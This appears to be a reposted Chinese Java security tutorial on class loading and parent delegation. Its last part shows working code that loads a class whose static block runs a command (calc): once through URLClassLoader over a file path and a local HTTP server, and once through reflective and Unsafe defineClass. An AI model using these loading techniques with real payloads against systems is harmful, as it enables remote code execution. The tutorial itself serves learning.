Java安全--篇2-类的动态加载

news2024/12/29 10:51:21

类的动态加载

首先我们来了解一下构造代码块和静态代码块:Java中静态代码块、构造代码块、构造函数、普通代码块 - YSOcean - 博客园

// 静态代码块
static {
    System.out.println("静态代码块");
}

// 构造代码块
{
    System.out.println("构造代码块");
}

继上周我们重写了Person类:

package packet1;

import java.io.Serializable;

public class Person implements Serializable {
    private String name;
    private int age;
    static int id;

    public Person(){
        System.out.println("无参构造方法");
    }

    static {
        System.out.println("静态代码块");
    }

    {
        System.out.println("构造代码块");
    }

    public Person(String name, int age){
        this.name = name;
        this.age = age;
        System.out.println("有参代码块");
    }

    public static void staticFunction(){
        System.out.println("静态方法");
    }

}

我们先写一个main来实例化Person看一下结果:

看到这个结果我们可以观察到两个信息:

  1. 实例化一个类后调用了静态代码块和构造代码块
  2. 执行的顺序是 静态代码块->构造代码块 -> 无参构造方法

接下来我们利用反射来尝试获取类看看会发生什么:

发现只调用了静态代码块

为什么?了解一下类是怎么加载到JVM中的:

一个类从被加载到虚拟机内存中开始,到卸载出内存,它的整个生命周期包括:加载(Loading)、验证(Verification)、准备(Preparation)、解析(Resolution)、初始化(Initialization)、使用(Using)和卸载(Unloading)7个阶段。

类加载过程,以及什么是双亲委派? - 掘金

用图来说就是这样:

重要的步骤就三步

  • 加载
  • 连接
  • 初始化

只要初始化了就会执行静态代码块

如果实例化那么与对象相关的实例化和构造方法也会被调用

那么为什么forName会初始化类呢?我们可以看一下forName的构造函数:

其中之一的构造函数是这样

  • 参数一
    • 类名
  • 参数二
    • 是否初始化
  • 参数三
    • 使用的类加载器

所以我们如果这样就不会初始化类了:

将initialize这个参数设置成为false,代表不进行初始化。

运行结果:

发现只是对类进行了加载,并没有初始化。

我们这样使用forName:

如果跟进forName:

这一步我们就调用了一个参数的构造方法,但是在这个构造方法里面还是会调用四个参数的构造方法。可以看见默认的initialize默认是true,因此用一个参数的构造方法默认是会初始化的,我们继续往下看是如何初始化的。

Class.forName->Class.forName0->ClassLoader.loadClass


继续跟进发现到了Launcher.loadClass

这些检查机制过了之后就调用super.loadClass,即 ClassLoader.loadClass,发现还是回到了ClassLoader.loadClass


到了这一步里面有一个判断parent!=null,这里涉及到双亲委派

双亲委派:

在逻辑加载上是这样的:

我们可以尝试获取一下当前的应用类加载器是哪一个:

运行结果是ApplicationClassLoader。

当我们运行这个程序的时候要加载Person类,它并不会马上加载,而是会委托自己的逻辑父类ExtensionClassLoader去加载,ExtensionClassLoader会委托自己的逻辑父类BootstrapClassLoader去加载,如果这两个类加载器都无法加载,那么才会自己加载。

  • BootstrapClassLoader(启动类加载器)是负责加载基础的String类、java.lang类等比较基础的类。
  • ExtensionClassLoader就是加载扩展类。
  • AppClassLoader应用类加载器,又称为系统类加载器,负责在JVM启动时,加载来自在命令java中的classpath或者java.class.path系统属性或者CLASSPATH操作系统属性所指定的JAR类包和类路径。

那么为什么要说逻辑父类去加载?

可以看见AppClassLoader和ExtClassLoader是继承于同一个类URLClassLoader,所以在类的关系上,他们是同级。但是在双亲委派的逻辑关系上他们却是子父类


接下来会调用ClassLoader.findClass->URLClassLoader.findClass

这里这行代码是获取类名


URLClassLoader.findClass->URLClassLoader.defineClass

到了definClass里面发现已经开始创建byte数组了,其实在defineClass里面就是完成了类的加载

加载完后出来就是:

判断是否resolve(解析) 类的流程:加载、解析、初始化

return的路径:ClassLoader->LauncherLoader->ClassLoader->Class


小结一下:

forName的整个类的继承关系是这样的:

ClassLoader->SecureClassLoader->URLClassLoader->AppClassLoader

->ExtClassLoader

调用顺序是这样的:

loadClass->findClass(重写的方法)->defineClass(字节码加载类)

安全问题

我们如果可以利用URLClassLoader,就可以通过把恶意代码写在静态代码块里面来加载从而执行命令。

我们首先编译一个恶意的Hello类:

import java.io.IOException;

public class Hello {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

再使用一个URLClassLoader来加载这个类:

package packet1;

import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;

public class Test {
    public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InstantiationException, IllegalAccessException {
        URLClassLoader uc = new URLClassLoader(new URL[]{new URL("file:///D:\\JAVA\\IDEA\\IntelliJ IDEA 2021.3.3\\Project\\Test\\out\\production\\Test\\packet1\\")});
        Class<?> hello = uc.loadClass("Hello");
        hello.newInstance();
    }
}

运行结果,成功弹出计算机。

但是我们这里是利用了file协议,file协议是本地协议。我们可以使用http协议

首先,我们在某个路径开启http服务:

然后修改Hello.java:

package packet1;

import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;

public class Test {
    public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InstantiationException, IllegalAccessException {
        URLClassLoader uc = new URLClassLoader(new URL[]{new URL("http://127.0.0.1:9999/")});
        Class<?> hello = uc.loadClass("Hello");
        hello.newInstance();
    }
}

同样可以触发计算器。

如果服务器不出网的话可以利用defineClass:

package packet1;

import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Test {
    public static void main(String[] args) throws IOException, IllegalAccessException, NoSuchMethodException, InvocationTargetException, InstantiationException {
        Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        method.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("D:\\JAVA\\IDEA\\IntelliJ IDEA 2021.3.3\\Project\\Test\\out\\production\\Test\\Hello.class"));
        Object hello = method.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length);
        Class c = (Class)hello;
        c.newInstance();
    }

}

还有另一个类可以调用definClass:

package packet1;

import sun.misc.Unsafe;

import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Test {
    public static void main(String[] args) throws IOException, IllegalAccessException, NoSuchMethodException, InvocationTargetException, InstantiationException, NoSuchFieldException {
        Field u = Unsafe.class.getDeclaredField("theUnsafe");
        u.setAccessible(true);
        Unsafe c = (Unsafe)u.get(null);
        byte[] code = Files.readAllBytes(Paths.get("D:\\JAVA\\IDEA\\IntelliJ IDEA 2021.3.3\\Project\\Test\\out\\production\\Test\\Hello.class"));
        Class<?> test = c.defineClass("Hello", code, 0, code.length, ClassLoader.getSystemClassLoader(), null);
        test.newInstance();

    }
}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/62194.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

使用Jetpack组件Navigation实现Android开发中页面跳转

使用Jetpack组件Navigation实现Android开发中页面跳转 ​目录 一、前言 1.概述 2.导航图的创建&#xff08;官网&#xff09; 二、基本使用 1.依赖配置 2.具体实例&#xff1a;使用Navigation实现页面的跳转。 2.1.class的创建 2.2 、页面布局文件的创建 2.3 向 Acti…

Abaqus血管支架仿真攻略之几何创建与网格划分

作者&#xff1a;江丙云&#xff0c;仿真秀平台优秀讲师 前不久&#xff0c;笔者推送的冠脉支架的参数化建模和优化、Abaqus网格卷曲WrapMesh&#xff0c;冠脉支架的参数化建模和优化&#xff0c;以及Abaqus疲劳分析|Goodman插件等原创文章后&#xff0c;后台留言的读者众多&a…

GDP-海藻糖,5‘-鸟苷二磷酸岩藻糖,GDP-fucose ,CAS:15839-70-0

产品名称&#xff1a;GDP-海藻糖&#xff0c;5-鸟苷二磷酸岩藻糖&#xff0c;二磷酸鸟苷岩藻糖&#xff0c;GDP-L-岩藻糖 英文名称&#xff1a;GDP-fucose&#xff0c;Guanosine 5-diphosphate-L-fucose disodium salt CAS&#xff1a;15839-70-0 Mol. Formula C16H23N5O…

基于模糊神经网络算法预测电价(Matlab代码实现)

&#x1f4cb;&#x1f4cb;&#x1f4cb;本文目录如下&#xff1a;⛳️⛳️⛳️ ​ 目录 1 概述 2 模糊神经网络简介 3 运行结果 4 参考文献 5 Matlab代码实现 1 概述 近年来,随着能源短缺和环境问题的日益凸显,太阳能、风能等各种形式的清洁能源得到广泛应用,微网作为分布式…

【云原生 | 46】高可用的开源键值数据库Etcd的安装与使用

&#x1f341;博主简介&#xff1a; &#x1f3c5;云计算领域优质创作者 &#x1f3c5;2022年CSDN新星计划python赛道第一名 &#x1f3c5;2022年CSDN原力计划优质作者 &#x1f3c5;阿里云ACE认证高级工程师 &#x1f3c5;阿里云开发者社区专…

第二证券|超300家机构关注两大赛道龙头,透露市场增长及发展方向

中科创达、奥普特成为本周调研组织数量最多的两家公司。 智能操作体系龙头获365家组织调研 证券时报数据宝计算&#xff0c;11月27日至12月3日&#xff0c;组织算计调研上市公司291家。被调研方多属于电子、机械设备、医药生物、电力设备、计算机、国防军工等板块&#xff0c;…

安卓属性动画

​ 一&#xff0e;三种安卓动画 Tween Animation(补间动画、视图动画)&#xff1a;通过对场景里的对象不断做图像变换&#xff08;平移、缩放、旋转&#xff09;产生的动画效果&#xff0c;即是一种渐变动画。 Frame Animation(帧动画)&#xff1a;顺序播放事先做好的图像&…

基于PLC的工业晾晒架系统

目录 前言 6 第一章 工业晾晒架的发展现状及趋势 7 1.1自动工业晾晒架的基本介绍 7 1.2自动工业晾晒架发展史和发展现状 8 第二章 自动晾晒架的智能模块 9 2.1自动晾晒架的结构框图 9 2.2自动晾晒架的机械理论 10 第三章 自动晾晒架的硬件设计 11 3.1电源设计部分 12 3.2 PLC的…

组合模式

文章目录思考组合模式1.组合模式的本质2.何时选用组合模式3.优缺点4.实现思考组合模式 组合模式实际上就是让客户端不再区分操作的是组合对象还是叶子对象&#xff0c;而是以一个统一的方式来操作。 1.组合模式的本质 组合模式的本质:统一叶子对象和组合对象。 组合模式通过把叶…

No.179 念念随风上九霄

引言有人跟老梁说&#xff0c;你挺忙的吧&#xff0c;更新变少了。害&#xff0c;可不是嘛&#xff1f;时间不太够&#xff0c;凑不出来了。凑不出来就不凑它了&#xff0c;扯扯其他的吧。在大城市生活节奏是快&#xff0c;个人也被裹挟着运转&#xff0c;无处可逃。从早到晚&a…

[附源码]计算机毕业设计基于SpringBoot动漫电影网站

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

如何用 7 分钟击破 Serverless 落地难点?

当前&#xff0c;Serverless 覆盖的技术场景正在不断变广。Serverless 已在微服务、在线应用、事件驱动、任务处理等众多场景被验证且广泛应用 。当你想要部署一个网站时&#xff0c;需要自己购买服务器并花费时间去维护&#xff0c;造成资源浪费不说&#xff0c;还要耗费精力。…

【NR 物理资源】

NR中与物理资源相关的概念主要包括天线端口、资源网格、资源单元、资源块RB和BWP等。 文章目录天线端口&#xff08;Antenna Ports&#xff09;资源网格Resource grid和资源单元RE资源块Resource Block部分带宽BWP天线端口&#xff08;Antenna Ports&#xff09; 天线端口定义 …

qmake source code 解读

qmake的主要功能执行入口在main.cpp中的runQMake(int argc, char **argv)中。其主要框架如下: runQMake(int argc, char **argv){QMakeVfs vfs; //初始化qmake的文件系统。virtual file system。vfs会为每个文件赋予一个id,并提供根据id进行操作的函数。Option::vfs &v…

交通流的微观模型(Matlab代码实现)

&#x1f352;&#x1f352;&#x1f352;欢迎关注&#x1f308;&#x1f308;&#x1f308; &#x1f4dd;个人主页&#xff1a;我爱Matlab &#x1f44d;点赞➕评论➕收藏 养成习惯&#xff08;一键三连&#xff09;&#x1f33b;&#x1f33b;&#x1f33b; &#x1f34c;希…

用好单例设计模式,代码性能提升300%

目录 一次请求执行流程java代码是如何运行的&#xff1f;堆内存满了后怎么办&#xff1f;用单例模式如何优化系统性能&#xff1f; 大家好&#xff0c;今天给大家分享一个写代码的设计模式&#xff0c;就是我们最最耳熟能详的单例设计模式。 可能很多人都听说过这个单例设计模…

基于Dijkstra和A*算法的机器人路径规划(Matlab代码实现)

目录 &#x1f4a5;1 概述 &#x1f4da;2 运行结果 &#x1f389;3 参考文献 &#x1f468;‍&#x1f4bb;4 Matlab代码 &#x1f4a5;1 概述 网络分析是GIS中非常重要的空间分析功能之一, 最短路径分析又是网络分析的核心算法, 该算法的效率决定了网络分析的功能和效率…

【CSDN】官方Markdown示例教程

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题&#xff0c;有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注…

Docker学习系列3:常用命令之容器命令

本文是Docker学习系列教程中的第三篇。前几篇教程如下&#xff1a; 「图文教程」Windows11下安装Docker Desktop 「填坑」在windows系统下安装Docker Desktop后迁移镜像位置 Docker学习系列1-如何安装docker? 【Docker学习系列】Docker学习2-docker设置阿里云镜像加速器 【Doc…

简单宠物网页设计作业 静态HTML动物介绍网页作业 DW宠物网站模板下载 大学生简单野生动物网页作品代码

&#x1f389;精彩专栏推荐 &#x1f4ad;文末获取联系 ✍️ 作者简介: 一个热爱把逻辑思维转变为代码的技术博主 &#x1f482; 作者主页: 【主页——&#x1f680;获取更多优质源码】 &#x1f393; web前端期末大作业&#xff1a; 【&#x1f4da;毕设项目精品实战案例 (10…